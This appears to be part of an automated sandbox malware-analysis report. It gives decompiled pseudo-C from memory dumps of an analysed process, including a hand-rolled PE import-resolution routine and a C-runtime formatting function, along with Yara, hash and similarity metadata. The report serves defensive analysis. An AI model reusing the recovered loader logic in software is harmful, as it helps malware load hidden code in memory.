                                                                                                                            				if ( *((intOrPtr*)(_v64 + 0xc)) == 0) goto 0xf8a76fd1;
                                                                                                                            				memcpy(__edi, __esi, 0x40);
                                                                                                                            				r8d = _a28 & 0x000000ff;
                                                                                                                            				E0000025B25BF8A76284(0x40, _a16 + _v64, _v100);
                                                                                                                            				LoadLibraryA(??);
                                                                                                                            				_a20 = _v4;
                                                                                                                            				_v84 = _a4 + _v76;
                                                                                                                            				_v92 = _a4 + _v76;
                                                                                                                            				if ( *_v92 == 0) goto 0xf8a76fbe;
                                                                                                                            				if (_v84 == 0) goto 0xf8a76f2a;
                                                                                                                            				if (( *_v84 & 0x00000000) == 0) goto 0xf8a76f2a;
                                                                                                                            				_t150 = _a20 +  *((intOrPtr*)(_a20 + 0x3c));
                                                                                                                            				_v68 = _t150;
                                                                                                                            				_v44 = _v68 + 0x88 + _t150 * 0;
                                                                                                                            				_v68 = _a20 + _v44;
                                                                                                                            				_v60 = _a20 + _v68;
                                                                                                                            				_v60 = _v60 + (( *_v84 & 0x0000ffff) - _v68) * 4;
                                                                                                                            				 *_v92 = _a20 + _v60;
                                                                                                                            				goto 0xf8a76f95;
                                                                                                                            				_v52 = _a4 +  *_v92;
                                                                                                                            				memcpy(__esi + 0x80, __esi, 0x40);
                                                                                                                            				r8d = _a16 & 0x000000ff;
                                                                                                                            				E0000025B25BF8A76284(0x40, _v52 + 2, _v112);
                                                                                                                            				_t169 = _v16;
                                                                                                                            				 *((intOrPtr*)(_t169 + 8))();
                                                                                                                            				 *_v104 = _t169;
                                                                                                                            				_v104 = _v104 + 8;
                                                                                                                            				if (_v96 == 0) goto 0xf8a76fb9;
                                                                                                                            				_v96 = _v96 + 8;
                                                                                                                            				goto 0xf8a76e3c;
                                                                                                                            				_v88 = _v88 + 0x14;
                                                                                                                            				goto 0xf8a76da3;
                                                                                                                            				return memset(__esi + 0x80, 0, 0x40 << 0);
                                                                                                                            			}























                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: f0d0416421f951180636bdee971ceb80d681f056dbaecdb4e99b1f1a91249793
                                                                                                                            • Instruction ID: 37c733615614be414afb1b3f2aeaa38ceaab6c88a828df5e0f1c0b520b7dc541
                                                                                                                            • Opcode Fuzzy Hash: f0d0416421f951180636bdee971ceb80d681f056dbaecdb4e99b1f1a91249793
                                                                                                                            • Instruction Fuzzy Hash: 66718636219B8486CEA0CB19E89035EB7A0F7C8B94F549125EBCE83B69DF7CD455CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 887941e60b476c11782dcb97a24cca0b909baaeecef9bac04b9bb155144e0c7f
                                                                                                                            • Instruction ID: 29b2a58d3713e86f7743172fd1b5506a4070a9f5a99729365c7ef07b04c76dbc
                                                                                                                            • Opcode Fuzzy Hash: 887941e60b476c11782dcb97a24cca0b909baaeecef9bac04b9bb155144e0c7f
                                                                                                                            • Instruction Fuzzy Hash: B931CD73618B4486DB61CB15E84431EBBA0F3C8BA4F144215FA8D83BA8DB7CC594CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 2950348734-1077428164
                                                                                                                            • Opcode ID: 07f065100d3b9576c565e68423642ffc0132d93c0c30c477d6b521816772cb63
                                                                                                                            • Instruction ID: e364ae2fabe4e4aab46307a5c2c10833994dbac5534ceaedbdf50ca17df38b0b
                                                                                                                            • Opcode Fuzzy Hash: 07f065100d3b9576c565e68423642ffc0132d93c0c30c477d6b521816772cb63
                                                                                                                            • Instruction Fuzzy Hash: F2621A32A18E458AFF6A8A18CC493B9B7E1FB57322F34011DF497D39E1D734D8028699
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 57%
                                                                                                                            			E0000025B25BF8A7CC10(void* __ebx, void* __edx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, void* __r8, intOrPtr* __r9, long long __r10, void* __r11) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r12;
                                                                                                                            				void* _t223;
                                                                                                                            				void* _t224;
                                                                                                                            				void* _t227;
                                                                                                                            				void* _t231;
                                                                                                                            				void* _t234;
                                                                                                                            				char _t235;
                                                                                                                            				signed int _t236;
                                                                                                                            				void* _t240;
                                                                                                                            				signed int _t241;
                                                                                                                            				void* _t245;
                                                                                                                            				signed int _t246;
                                                                                                                            				signed int _t251;
                                                                                                                            				signed int _t257;
                                                                                                                            				void* _t263;
                                                                                                                            				signed int _t281;
                                                                                                                            				unsigned int _t298;
                                                                                                                            				signed int _t309;
                                                                                                                            				void* _t310;
                                                                                                                            				signed int _t316;
                                                                                                                            				signed int _t319;
                                                                                                                            				unsigned int _t337;
                                                                                                                            				void* _t338;
                                                                                                                            				intOrPtr _t348;
                                                                                                                            				signed int _t375;
                                                                                                                            				signed int _t381;
                                                                                                                            				void* _t389;
                                                                                                                            				char* _t393;
                                                                                                                            				signed int _t399;
                                                                                                                            				void* _t423;
                                                                                                                            				signed long long _t439;
                                                                                                                            				signed long long _t440;
                                                                                                                            				intOrPtr _t447;
                                                                                                                            				char* _t451;
                                                                                                                            				long long* _t452;
                                                                                                                            				signed long long _t456;
                                                                                                                            				intOrPtr _t462;
                                                                                                                            				void* _t465;
                                                                                                                            				char* _t467;
                                                                                                                            				char* _t469;
                                                                                                                            				char* _t471;
                                                                                                                            				signed short* _t472;
                                                                                                                            				void* _t480;
                                                                                                                            				void* _t481;
                                                                                                                            				intOrPtr* _t482;
                                                                                                                            				void* _t513;
                                                                                                                            				void* _t521;
                                                                                                                            				signed int* _t524;
                                                                                                                            				signed int* _t525;
                                                                                                                            				signed int* _t526;
                                                                                                                            				signed int* _t527;
                                                                                                                            				void* _t531;
                                                                                                                            				void* _t534;
                                                                                                                            				void* _t535;
                                                                                                                            				void* _t537;
                                                                                                                            				signed long long _t538;
                                                                                                                            				signed long long _t548;
                                                                                                                            				signed long long _t562;
                                                                                                                            				signed long long _t574;
                                                                                                                            				void* _t576;
                                                                                                                            				intOrPtr* _t578;
                                                                                                                            				intOrPtr* _t580;
                                                                                                                            				long long _t583;
                                                                                                                            				intOrPtr* _t584;
                                                                                                                            				signed int* _t585;
                                                                                                                            				void* _t589;
                                                                                                                            				void* _t591;
                                                                                                                            
                                                                                                                            				 *((long long*)(_t537 + 0x18)) = __rbx;
                                                                                                                            				_t535 = _t537 - 0x1e0;
                                                                                                                            				_t538 = _t537 - 0x2e0;
                                                                                                                            				_t439 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				_t440 = _t439 ^ _t538;
                                                                                                                            				 *(_t535 + 0x1d8) = _t440;
                                                                                                                            				 *((long long*)(_t538 + 0x68)) = __rcx;
                                                                                                                            				 *((intOrPtr*)(_t538 + 0x60)) = 0;
                                                                                                                            				r14d = 0;
                                                                                                                            				 *(_t538 + 0x54) = 0;
                                                                                                                            				r12d = 0;
                                                                                                                            				 *(_t538 + 0x48) = 0;
                                                                                                                            				 *(_t538 + 0x5c) = 0;
                                                                                                                            				 *(_t538 + 0x50) = 0;
                                                                                                                            				E0000025B25BF8A7C0AC(_t440, _t535 - 0x58, __r8);
                                                                                                                            				E0000025B25BF8A7B89C(_t440);
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				r10d = 0;
                                                                                                                            				 *(_t535 - 0x70) = _t440;
                                                                                                                            				if (__rcx == 0) goto 0xf8a7d5f0;
                                                                                                                            				if (( *(__rcx + 0x18) & 0x00000040) != 0) goto 0xf8a7cd2f;
                                                                                                                            				_t562 = E0000025B25BF8A7F864(__edx, _t440, __rcx);
                                                                                                                            				if (_t562 + 2 - 1 <= 0) goto 0xf8a7ccde;
                                                                                                                            				r8d = r8d & 0x0000001f;
                                                                                                                            				goto 0xf8a7cce1;
                                                                                                                            				if (( *0x25BF8A9D2B8 & 0x0000007f) != 0) goto 0xf8a7d5f0;
                                                                                                                            				if (_t562 + 2 - 1 <= 0) goto 0xf8a7cd17;
                                                                                                                            				goto 0xf8a7cd1e;
                                                                                                                            				if (( *(_t562 * 0x58 +  *((intOrPtr*)(0x25bf8a5f400 + 0x43e00 + (_t562 >> 5) * 8)) + 0x38) & 0x00000080) != 0) goto 0xf8a7d5f0;
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				r10d = 0;
                                                                                                                            				if (__rdx == 0) goto 0xf8a7d5f0;
                                                                                                                            				r15b =  *__rdx;
                                                                                                                            				 *(_t538 + 0x40) = r10d;
                                                                                                                            				 *(_t538 + 0x44) = r10d;
                                                                                                                            				 *((long long*)(_t535 - 0x80)) = __r10;
                                                                                                                            				if (r15b == 0) goto 0xf8a7d608;
                                                                                                                            				r11d = 0x200;
                                                                                                                            				 *(_t535 - 0x68) =  &(__rdx[0]);
                                                                                                                            				if (r10d < 0) goto 0xf8a7d5e7;
                                                                                                                            				if (_t591 - 0x20 - 0x58 > 0) goto 0xf8a7cd8b;
                                                                                                                            				goto 0xf8a7cd8e;
                                                                                                                            				_t480 = r10d + r10d * 8 + r10d;
                                                                                                                            				_t298 = ( *(_t480 + 0x25bf8a8d980) & 0x000000ff) >> 4;
                                                                                                                            				 *(_t538 + 0x58) = _t298;
                                                                                                                            				if (_t298 == 8) goto 0xf8a7d5f0;
                                                                                                                            				_t337 = _t298;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d4a9;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d5c3;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d573;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d537;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d52f;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d4fa;
                                                                                                                            				if (_t337 == 0) goto 0xf8a7d41f;
                                                                                                                            				if (_t337 != 0) goto 0xf8a7d40a;
                                                                                                                            				_t281 = r15b;
                                                                                                                            				_t338 = _t281 - 0x64;
                                                                                                                            				if (_t338 > 0) goto 0xf8a7cf6c;
                                                                                                                            				if (_t338 == 0) goto 0xf8a7d06d;
                                                                                                                            				if (_t281 == 0x41) goto 0xf8a7cf41;
                                                                                                                            				if (_t281 == 0x43) goto 0xf8a7cee7;
                                                                                                                            				if ((_t480 - 0x00000045 & 0xfffffffd) == 0) goto 0xf8a7cf41;
                                                                                                                            				if (_t281 == 0x53) goto 0xf8a7ce9b;
                                                                                                                            				if (_t281 == 0x58) goto 0xf8a7d006;
                                                                                                                            				if (_t281 == 0x5a) goto 0xf8a7ce53;
                                                                                                                            				if (_t281 == 0x61) goto 0xf8a7cf4d;
                                                                                                                            				if (_t281 == 0x63) goto 0xf8a7cef5;
                                                                                                                            				goto 0xf8a7d278;
                                                                                                                            				_t447 =  *__r9;
                                                                                                                            				_t578 = __r9 + 8;
                                                                                                                            				if (_t447 == 0) goto 0xf8a7ce8f;
                                                                                                                            				_t348 =  *((intOrPtr*)(_t447 + 8));
                                                                                                                            				if (_t348 == 0) goto 0xf8a7ce8f;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t348 >= 0) goto 0xf8a7ce85;
                                                                                                                            				asm("cdq");
                                                                                                                            				 *(_t538 + 0x50) = 1;
                                                                                                                            				goto 0xf8a7d274;
                                                                                                                            				 *(_t538 + 0x50) = r10d;
                                                                                                                            				goto 0xf8a7d274;
                                                                                                                            				goto 0xf8a7d269;
                                                                                                                            				if ((r14d & 0x00000830) != 0) goto 0xf8a7cea9;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t462 =  *_t578;
                                                                                                                            				_t223 =  ==  ? 0x7fffffff : r12d;
                                                                                                                            				if ((r14d & 0x00000810) == 0) goto 0xf8a7cfd2;
                                                                                                                            				 *(_t538 + 0x50) = 1;
                                                                                                                            				_t463 =  ==  ?  *0xf8a9c5c0 : _t462;
                                                                                                                            				_t481 =  ==  ?  *0xf8a9c5c0 : _t462;
                                                                                                                            				goto 0xf8a7cfc6;
                                                                                                                            				if ((r14d & 0x00000830) != 0) goto 0xf8a7cef5;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t580 = _t578 + 0x10;
                                                                                                                            				if ((r14d & 0x00000810) == 0) goto 0xf8a7cf29;
                                                                                                                            				r9d =  *(_t580 - 8) & 0x0000ffff;
                                                                                                                            				_t513 = _t535 - 0x30;
                                                                                                                            				_t482 = _t538 + 0x44;
                                                                                                                            				_t224 = E0000025B25BF8A833AC();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t224 == 0) goto 0xf8a7cf38;
                                                                                                                            				 *(_t538 + 0x5c) = 1;
                                                                                                                            				goto 0xf8a7cf38;
                                                                                                                            				 *(_t538 + 0x44) = 1;
                                                                                                                            				 *((char*)(_t535 - 0x30)) =  *(_t580 - 8);
                                                                                                                            				goto 0xf8a7d278;
                                                                                                                            				 *(_t538 + 0x78) = 1;
                                                                                                                            				r15b = r15b + 0x20;
                                                                                                                            				r14d = r14d | 0x00000040;
                                                                                                                            				_t465 = _t535 - 0x30;
                                                                                                                            				_t319 = r11d;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7d18b;
                                                                                                                            				r12d = 6;
                                                                                                                            				goto 0xf8a7d1d1;
                                                                                                                            				if (0x7fffffff - 0x65 < 0) goto 0xf8a7d278;
                                                                                                                            				if (0x7fffffff - 0x67 <= 0) goto 0xf8a7cf4d;
                                                                                                                            				if (0x7fffffff == 0x69) goto 0xf8a7d06d;
                                                                                                                            				if (0x7fffffff == 0x6e) goto 0xf8a7d03b;
                                                                                                                            				if (0x7fffffff == 0x6f) goto 0xf8a7d02b;
                                                                                                                            				if (0x7fffffff == 0x70) goto 0xf8a7cffb;
                                                                                                                            				if (0x7fffffff == 0x73) goto 0xf8a7cea9;
                                                                                                                            				if (0x7fffffff == 0x75) goto 0xf8a7d071;
                                                                                                                            				if (0x7fffffff != 0x78) goto 0xf8a7d278;
                                                                                                                            				goto 0xf8a7d00b;
                                                                                                                            				_t227 = _t482 - 0x50;
                                                                                                                            				if ( *_t482 == r10w) goto 0xf8a7cfca;
                                                                                                                            				if (_t227 != 0) goto 0xf8a7cfba;
                                                                                                                            				goto 0xf8a7cff2;
                                                                                                                            				_t466 =  ==  ?  *0xf8a9c5b8 : _t465;
                                                                                                                            				_t486 =  ==  ?  *0xf8a9c5b8 : _t465;
                                                                                                                            				goto 0xf8a7cfec;
                                                                                                                            				if ( *((intOrPtr*)( ==  ?  *0xf8a9c5b8 : _t465)) == r10b) goto 0xf8a7cff0;
                                                                                                                            				if (_t227 - 1 != 0) goto 0xf8a7cfe2;
                                                                                                                            				 *(_t538 + 0x44) = 0x7fffffff;
                                                                                                                            				goto 0xf8a7d278;
                                                                                                                            				r12d = 0x10;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				 *((intOrPtr*)(_t538 + 0x60)) = 7;
                                                                                                                            				r9d = 0x10;
                                                                                                                            				if (r14b >= 0) goto 0xf8a7d077;
                                                                                                                            				 *((char*)(_t538 + 0x4c)) = 0x30;
                                                                                                                            				 *((char*)(_t538 + 0x4d)) = 0x58;
                                                                                                                            				goto 0xf8a7d07b;
                                                                                                                            				r9d = 8;
                                                                                                                            				if (r14b >= 0) goto 0xf8a7d077;
                                                                                                                            				r14d = r14d | r11d;
                                                                                                                            				goto 0xf8a7d077;
                                                                                                                            				_t524 =  *_t580;
                                                                                                                            				_t231 = E0000025B25BF8A79CA0();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t231 == 0) goto 0xf8a7d5f0;
                                                                                                                            				if ((r14b & 0x00000020) == 0) goto 0xf8a7d05e;
                                                                                                                            				 *_t524 = _t319;
                                                                                                                            				goto 0xf8a7d060;
                                                                                                                            				 *_t524 = _t319;
                                                                                                                            				 *(_t538 + 0x5c) = 1;
                                                                                                                            				goto 0xf8a7d3d9;
                                                                                                                            				r14d = r14d | 0x00000040;
                                                                                                                            				r9d = 0xa;
                                                                                                                            				_t375 = 0x00008000 & r14d;
                                                                                                                            				if (_t375 == 0) goto 0xf8a7d08f;
                                                                                                                            				goto 0xf8a7d0c9;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t375 < 0) goto 0xf8a7d085;
                                                                                                                            				_t583 = _t580 + 0x18;
                                                                                                                            				if ((r14b & 0x00000020) == 0) goto 0xf8a7d0b9;
                                                                                                                            				 *((long long*)(_t538 + 0x70)) = _t583;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7d0b2;
                                                                                                                            				goto 0xf8a7d0ce;
                                                                                                                            				r8d =  *(_t583 - 8) & 0x0000ffff;
                                                                                                                            				goto 0xf8a7d0ce;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7d0c5;
                                                                                                                            				_t548 =  *(_t583 - 8);
                                                                                                                            				goto 0xf8a7d0c9;
                                                                                                                            				r8d =  *(_t583 - 8);
                                                                                                                            				 *((long long*)(_t538 + 0x70)) = _t583;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7d0e1;
                                                                                                                            				if (_t548 >= 0) goto 0xf8a7d0e1;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t381 = 0x00008000 & r14d;
                                                                                                                            				if (_t381 != 0) goto 0xf8a7d0f0;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t381 < 0) goto 0xf8a7d0f0;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7d0fd;
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a7d108;
                                                                                                                            				r14d = r14d & 0xfffffff7;
                                                                                                                            				r12d =  >  ? r11d : r12d;
                                                                                                                            				r13d =  *((intOrPtr*)(_t538 + 0x60));
                                                                                                                            				_t467 = _t535 + 0x1cf;
                                                                                                                            				asm("sbb ecx, ecx");
                                                                                                                            				 *(_t538 + 0x48) = 0x7fffffff - __ebx &  *(_t538 + 0x48);
                                                                                                                            				r12d = r12d - 1;
                                                                                                                            				if (r12d > 0) goto 0xf8a7d131;
                                                                                                                            				if ( ~_t548 == 0) goto 0xf8a7d151;
                                                                                                                            				_t106 = _t513 + 0x30; // 0x30
                                                                                                                            				_t234 = _t106;
                                                                                                                            				if (_t234 - 0x39 <= 0) goto 0xf8a7d14a;
                                                                                                                            				_t235 = _t234 + r13d;
                                                                                                                            				 *_t467 = _t235;
                                                                                                                            				goto 0xf8a7d122;
                                                                                                                            				_t584 =  *((intOrPtr*)(_t538 + 0x70));
                                                                                                                            				_t451 = _t535 + 0x1cf;
                                                                                                                            				_t236 = _t235 - __ebx;
                                                                                                                            				_t469 = _t467 - 1 + 1;
                                                                                                                            				 *(_t538 + 0x44) = _t236;
                                                                                                                            				if ((r11d & r14d) == 0) goto 0xf8a7d278;
                                                                                                                            				if (_t236 == 0) goto 0xf8a7d17c;
                                                                                                                            				_t389 =  *_t469 - 0x30;
                                                                                                                            				if (_t389 == 0) goto 0xf8a7d278;
                                                                                                                            				 *(_t538 + 0x44) =  *(_t538 + 0x44) + 1;
                                                                                                                            				 *((char*)(_t469 - 1)) = 0x30;
                                                                                                                            				goto 0xf8a7d278;
                                                                                                                            				if (_t389 != 0) goto 0xf8a7d19b;
                                                                                                                            				if (r15b != 0x67) goto 0xf8a7d1d1;
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a7d1d1;
                                                                                                                            				r12d =  >  ? r11d : r12d;
                                                                                                                            				if (r12d - 0xa3 <= 0) goto 0xf8a7d1d1;
                                                                                                                            				_t114 = _t574 + 0x15d; // 0x15d
                                                                                                                            				_t310 = _t114;
                                                                                                                            				E0000025B25BF8A7E798(_t469 - 1, _t310, _t524, _t531, _t535, _t591, _t589);
                                                                                                                            				 *((long long*)(_t535 - 0x80)) = _t451;
                                                                                                                            				_t393 = _t451;
                                                                                                                            				if (_t393 == 0) goto 0xf8a7d1cb;
                                                                                                                            				_t471 = _t451;
                                                                                                                            				goto 0xf8a7d1d1;
                                                                                                                            				r12d = 0xa3;
                                                                                                                            				_t452 =  *_t584;
                                                                                                                            				_t585 = _t584 + 8;
                                                                                                                            				_t532 = _t310;
                                                                                                                            				 *((long long*)(_t535 - 0x60)) = _t452;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				r9d = r15b;
                                                                                                                            				 *((long long*)(_t538 + 0x30)) = _t535 - 0x58;
                                                                                                                            				 *(_t538 + 0x28) =  *(_t538 + 0x78);
                                                                                                                            				 *(_t538 + 0x20) = r12d;
                                                                                                                            				 *_t452();
                                                                                                                            				if (_t393 == 0) goto 0xf8a7d23c;
                                                                                                                            				if (r12d != 0) goto 0xf8a7d23c;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				 *_t452();
                                                                                                                            				if (r15b != 0x67) goto 0xf8a7d25c;
                                                                                                                            				if ((r14d & 0x00000080) != 0) goto 0xf8a7d25c;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				_t240 =  *_t452();
                                                                                                                            				if ( *_t471 != 0x2d) goto 0xf8a7d269;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t472 = _t471 + 1;
                                                                                                                            				_t241 = E0000025B25BF8A82800(_t240, _t472);
                                                                                                                            				r10d = 0;
                                                                                                                            				 *(_t538 + 0x44) = _t241;
                                                                                                                            				if ( *(_t538 + 0x5c) != r10d) goto 0xf8a7d3d9;
                                                                                                                            				_t399 = r14b & 0x00000040;
                                                                                                                            				if (_t399 == 0) goto 0xf8a7d2ba;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t399 >= 0) goto 0xf8a7d297;
                                                                                                                            				 *((char*)(_t538 + 0x4c)) = 0x2d;
                                                                                                                            				goto 0xf8a7d2a2;
                                                                                                                            				if ((r14b & 0x00000001) == 0) goto 0xf8a7d2ad;
                                                                                                                            				 *((char*)(_t538 + 0x4c)) = 0x2b;
                                                                                                                            				 *(_t538 + 0x48) = 1;
                                                                                                                            				goto 0xf8a7d2be;
                                                                                                                            				if ((r14b & 0x00000002) == 0) goto 0xf8a7d2ba;
                                                                                                                            				 *((char*)(_t538 + 0x4c)) = 0x20;
                                                                                                                            				goto 0xf8a7d2a2;
                                                                                                                            				if ((r14b & 0x0000000c) != 0) goto 0xf8a7d2e4;
                                                                                                                            				E0000025B25BF8A7CBBC(0x20,  *(_t538 + 0x54) -  *(_t538 + 0x44) -  *(_t538 + 0x48), _t472, _t310, _t535,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40);
                                                                                                                            				 *(_t538 + 0x20) =  *(_t535 - 0x70);
                                                                                                                            				E0000025B25BF8A7D648( *(_t538 + 0x48), _t472, _t538 + 0x4c, _t310, _t535,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40, _t576, _t574);
                                                                                                                            				if ((r14b & 0x00000008) == 0) goto 0xf8a7d31e;
                                                                                                                            				if ((r14b & 0x00000004) != 0) goto 0xf8a7d31e;
                                                                                                                            				E0000025B25BF8A7CBBC(0x30,  *(_t538 + 0x54) -  *(_t538 + 0x44) -  *(_t538 + 0x48), _t472, _t310, _t535,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40);
                                                                                                                            				_t316 =  *(_t538 + 0x44);
                                                                                                                            				if ( *(_t538 + 0x50) == 0) goto 0xf8a7d399;
                                                                                                                            				if (_t316 <= 0) goto 0xf8a7d399;
                                                                                                                            				r9d =  *_t472 & 0x0000ffff;
                                                                                                                            				r8d = 6;
                                                                                                                            				_t245 = E0000025B25BF8A833AC();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t245 != 0) goto 0xf8a7d38b;
                                                                                                                            				if ( *((intOrPtr*)(_t535 - 0x78)) == 0) goto 0xf8a7d38b;
                                                                                                                            				 *(_t538 + 0x20) =  *(_t535 - 0x70);
                                                                                                                            				_t246 = E0000025B25BF8A7D648( *((intOrPtr*)(_t535 - 0x78)), _t472, _t535 + 0x1d0, _t310, _t535,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40, _t521, _t531);
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t316 - 1 != 0) goto 0xf8a7d330;
                                                                                                                            				goto 0xf8a7d3b7;
                                                                                                                            				 *(_t538 + 0x40) = _t246 | 0xffffffff;
                                                                                                                            				goto 0xf8a7d3bb;
                                                                                                                            				 *(_t538 + 0x20) =  *(_t535 - 0x70);
                                                                                                                            				E0000025B25BF8A7D648(_t316 - 1, _t472, _t472, _t532, _t535,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				if ( *(_t538 + 0x40) < 0) goto 0xf8a7d3d9;
                                                                                                                            				if ((r14b & 0x00000004) == 0) goto 0xf8a7d3d9;
                                                                                                                            				E0000025B25BF8A7CBBC(0x20,  *(_t538 + 0x54) -  *(_t538 + 0x44) -  *(_t538 + 0x48), _t472, _t532, _t535,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				_t456 =  *((intOrPtr*)(_t535 - 0x80));
                                                                                                                            				if (_t456 == 0) goto 0xf8a7d3f1;
                                                                                                                            				free(_t534);
                                                                                                                            				r10d = 0;
                                                                                                                            				 *((long long*)(_t535 - 0x80)) = __r10;
                                                                                                                            				_t525 =  *(_t535 - 0x68);
                                                                                                                            				_t309 =  *(_t538 + 0x58);
                                                                                                                            				r11d = 0x200;
                                                                                                                            				r15b =  *_t525;
                                                                                                                            				if (r15b == 0) goto 0xf8a7d5e7;
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				goto 0xf8a7cd62;
                                                                                                                            				if (r15b == 0x49) goto 0xf8a7d459;
                                                                                                                            				if (r15b == 0x68) goto 0xf8a7d453;
                                                                                                                            				if (r15b == 0x6c) goto 0xf8a7d43e;
                                                                                                                            				if (r15b != 0x77) goto 0xf8a7d40a;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				if ( *_t525 != 0x6c) goto 0xf8a7d44d;
                                                                                                                            				_t526 =  &(_t525[0]);
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000010;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				r14d = r14d | 0x00000020;
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				_t251 =  *_t526;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t251 != 0x36) goto 0xf8a7d475;
                                                                                                                            				if (_t526[0] != 0x34) goto 0xf8a7d475;
                                                                                                                            				_t527 =  &(_t526[0]);
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				if (_t251 != 0x33) goto 0xf8a7d48a;
                                                                                                                            				if (_t527[0] != 0x32) goto 0xf8a7d48a;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7d40a;
                                                                                                                            				_t423 = _t251 - 0x58 - 0x20;
                                                                                                                            				if (_t423 > 0) goto 0xf8a7d4a4;
                                                                                                                            				asm("dec eax");
                                                                                                                            				if (_t423 < 0) goto 0xf8a7d40a;
                                                                                                                            				 *(_t538 + 0x58) = r10d;
                                                                                                                            				 *(_t538 + 0x50) = r10d;
                                                                                                                            				if (E0000025B25BF8A83194(r15b & 0xffffffff, _t423, _t456, _t535 - 0x58) == 0) goto 0xf8a7d4e0;
                                                                                                                            				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40);
                                                                                                                            				r15b = _t527[0];
                                                                                                                            				if (r15b == 0) goto 0xf8a7d5f0;
                                                                                                                            				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t538 + 0x68)), _t538 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				goto 0xf8a7d3f5;
                                                                                                                            				if (r15b != 0x2a) goto 0xf8a7d519;
                                                                                                                            				r12d =  *_t585;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7d40a;
                                                                                                                            				r12d = r8d;
